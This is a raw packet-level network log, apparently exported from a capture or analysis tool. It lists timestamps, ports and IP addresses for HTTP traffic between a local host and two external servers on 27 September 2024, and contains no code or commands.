Sep 27, 2024 04:21:16.154545069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154555082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154566050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.154582977 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.154604912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.154604912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159039974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159049988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159060955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159102917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159363985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159382105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159404993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159415960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159429073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159462929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159462929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159462929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159492970 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159537077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159550905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159564018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159603119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159603119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159699917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.159712076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.159723997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159734964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159745932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159758091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159759998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.159809113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159809113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159809113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159854889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.159868956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.159879923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.159892082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.159914017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.159926891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.159945011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160034895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160047054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160057068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160068035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160079002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160088062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160095930 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160131931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160131931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160176039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160201073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160212994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160223961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160234928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160245895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.160254955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160254955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160293102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160294056 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.160372019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160383940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160394907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160407066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160418034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160428047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160440922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160445929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.160445929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.160476923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.160476923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.160502911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.160598993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.160999060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161058903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161166906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161178112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161189079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161199093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161211014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161223888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161223888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161231995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161267996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161267996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161297083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161308050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161351919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161351919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161484003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161495924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161573887 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161648035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161659002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161669016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161679983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161690950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161701918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161711931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161711931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161734104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161801100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161809921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161820889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161832094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161843061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161854029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161864996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161864996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161864996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161875010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161896944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161896944 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161943913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161961079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161972046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161982059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161982059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161982059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.161993027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.161995888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162004948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162017107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162026882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162031889 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162038088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162049055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162060022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162060022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162060022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162077904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162079096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162091017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162101984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162112951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.162120104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162130117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.162163019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.172688007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172702074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172713041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172761917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.172765017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172763109 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.172780037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172796965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172808886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172818899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.172820091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.172859907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.186986923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187103987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187114000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187125921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187136889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187148094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187159061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187175035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187175035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187210083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187274933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187288046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187330008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187449932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187460899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187473059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187485933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187496901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187508106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187510967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187510967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187520981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187542915 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187571049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.187679052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.187843084 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188011885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188023090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188034058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188088894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188088894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188188076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188199043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188213110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188222885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188242912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188242912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188266039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188329935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188342094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188391924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188391924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188500881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188512087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188524961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188536882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188546896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188556910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188556910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188559055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188589096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188637018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188637018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.188679934 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.188997030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189053059 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.189132929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189146042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189157009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189167023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189177990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189191103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189192057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.189203024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.189213991 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.189234972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.189265013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.208079100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208092928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208103895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208113909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208125114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208137035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208159924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.208192110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.208214045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.208231926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.209794044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209805965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209816933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209875107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.209875107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.209939957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209953070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209964037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.209975004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.210014105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.210014105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.213251114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213273048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213326931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.213399887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213412046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213424921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213435888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213464022 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.213495970 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.213550091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213561058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.213601112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.214170933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214181900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214194059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214205980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214217901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214227915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.214229107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214241028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214262009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.214293003 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.214329004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.214375019 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216422081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216434956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216445923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216504097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216504097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216599941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216619015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216629982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216640949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216654062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216655016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216666937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216676950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216681004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216691971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216722965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216722965 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216770887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216777086 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216784000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216798067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216808081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216818094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216845989 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216876030 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.216939926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216953039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216964006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216976881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216993093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.216999054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217005014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217029095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217029095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217061043 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217091084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217109919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217122078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217159986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217159986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217252970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217263937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217274904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217286110 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217298031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217302084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217340946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217340946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217401981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217413902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217426062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217437029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217447996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217457056 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217458963 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217483997 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217514992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217549086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217562914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217575073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217585087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217596054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217605114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217611074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217632055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217653990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.217706919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217719078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217730045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217741966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.217749119 CEST	49724	80	192.168.2.5	176.113.115.95
